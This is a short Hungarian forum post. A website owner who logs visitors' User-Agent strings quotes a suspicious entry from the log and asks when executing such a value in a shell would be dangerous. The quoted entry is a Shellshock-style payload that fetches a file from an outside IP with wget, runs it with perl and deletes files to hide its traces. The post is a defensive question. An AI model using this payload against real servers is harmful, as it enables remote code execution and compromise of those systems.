USER_AGENT exploit?
A weboldalamon a látogatói statisztikákat egy adatbázisban tárolom, ahol puszta kíváncsiságból bedobtam egy useragent oszlopot is, ami értelemszerűen a $_SERVER['USER_AGENT'] változó értékét kapja meg (szerencsére az admin panel sehol nem iratja ki ezt). Ahogy nézegettem az adatokat, ezt találtam köztük:Annyira rájöttem, hogy a kis hamis letöltene valami fájlt az adott IP-ről, aztán azt lefuttatná perl-el és eltakarítaná a nyomait.
Az egyértelmű, hogy nem jó szándékkal tenné, viszont az érdekelne, hogy mely esetekben fordulhat elő, hogy shell scriptben futtassak le USER_AGENT-et? Mikor jelent ez veszélyt?
■ () { :;}; /bin/bash -c "wget -O /var/tmp/wow1 208.118.61.44/wow1;perl /var/tmp/wow1;rm -rf /var/tmp/
Az egyértelmű, hogy nem jó szándékkal tenné, viszont az érdekelne, hogy mely esetekben fordulhat elő, hogy shell scriptben futtassak le USER_AGENT-et? Mikor jelent ez veszélyt?
Szomszédos téma
Köszi